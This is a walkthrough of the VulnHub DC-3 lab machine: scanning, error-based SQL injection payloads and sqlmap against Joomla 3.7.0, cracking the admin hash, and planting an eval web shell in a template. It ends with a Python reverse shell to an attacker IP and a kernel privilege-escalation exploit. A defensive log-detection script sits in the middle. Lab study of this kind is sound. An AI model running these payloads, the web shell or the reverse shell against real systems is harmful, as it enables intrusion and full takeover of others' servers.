
vulnhub DC-3

Scanning

nmap -sP 192.168.3.0/24
nmap -sC -sV -p- 192.168.3.176
Port 80
  • SQL injection: error-based injection via updatexml
1' and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='joolmadb' and table_name='associations'),0x7e),1)

Searching for exploits && cracking with john

searchsploit joomla 3.7.0
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

sqlmap.py -u "http://192.168.81.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

--keep-alive
--null-connection
--threads=3

+-------+-----+--------------------------------------------------------------+----------+
| name  | id  | password                                                     | username |
+-------+-----+--------------------------------------------------------------+----------+
| admin | 629 | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |          |
+-------+-----+--------------------------------------------------------------+----------+

nano s # save the user:hash pair to a file
admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

john s # crack the password
snoopy (admin)
https://github.com/HoangKien1020/CVE-2021-23132

Write eval($_POST['s']);phpinfo(); into the template's /error.php
http://192.168.81.135/administrator/index.php?option=com_templates&view=template&id=503&file=L2Vycm9yLnBocA

http://192.168.81.135/templates/beez3/error.php # connection password: s
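As an added detection example (not part of the original write-up), the Python below scans constructed Apache-style access-log lines for the three request patterns used above: SQL functions in the com_fields list[fullordering] parameter, an administrator edit of a template source file through com_templates (decoding the base64 file parameter), and a POST straight to a PHP file under /templates/. The sample IPs, timestamps and user agents are assumptions.

```python
import re
import base64
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines modelled on the requests in the write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,user()),1) HTTP/1.1" 500 812 "-" "sqlmap/1.7"',
    '10.0.0.6 - - [01/Jan/2024:12:00:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:12:05:10 +0000] "POST /administrator/index.php?option=com_templates&view=template&id=503&file=L2Vycm9yLnBocA HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:12:05:20 +0000] "POST /templates/beez3/error.php HTTP/1.1" 200 42 "-" "antSword/v2.1"',
]

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Values Joomla itself generates for list[fullordering] look like "a.ordering ASC".
ORDERING_OK = re.compile(r'^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$', re.I)
SQLI_HINT = re.compile(r'updatexml|extractvalue|concat|select|\(', re.I)

def decode_template_file(param: str) -> str:
    """com_templates passes the edited path base64-encoded without padding."""
    padded = param + "=" * (-len(param) % 4)
    try:
        return base64.b64decode(padded).decode("utf-8", "replace")
    except ValueError:
        return "<undecodable>"

def analyse(lines):
    """Return (line_no, rule, detail) tuples for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        method, target = m.group("method"), m.group("target")
        url = urlsplit(target)
        qs = parse_qs(url.query, keep_blank_values=True)
        option = qs.get("option", [""])[0]
        # Rule 1: SQL functions or unexpected syntax in the com_fields ordering parameter
        for val in qs.get("list[fullordering]", []):
            if not ORDERING_OK.match(val) or SQLI_HINT.search(val):
                findings.append((n, "sqli_com_fields", val))
        # Rule 2: administrator edit of a template source file; record which file
        if option == "com_templates" and "file" in qs:
            findings.append((n, "template_edit", decode_template_file(qs["file"][0])))
        # Rule 3: POST directly to a PHP file in the templates tree (webshell traffic)
        if method == "POST" and url.path.startswith("/templates/") and url.path.endswith(".php"):
            findings.append((n, "post_to_template_php", url.path))
    return findings

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

The legitimate ordering request on the second line produces no finding, so the rules can be run over real logs without flagging normal Joomla admin traffic.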

Privilege escalation && interactive shell

lsb_release -a
uname -a
cat /proc/version # kernel information
cat /etc/*-release # distribution information
cat /etc/issue # distribution information
searchsploit ubuntu 16.04 4.4
cat /usr/share/exploitdb/exploits/linux/local/39772.txt

tar -xvf exploit.tar
  • An interactive shell is needed here for the privilege escalation to succeed; AntSword's shell is not interactive.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.81.129",8002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Save the command to a file, upload it with AntSword, then execute it to get an interactive shell.

Privilege escalation with 39772.txt succeeded

tar -xvf exploit.tar

./compile.sh
./doubleput

Summary

  • Using searchsploit
  • Moving from the AntSword shell to an interactive shell
  • Kernel privilege escalation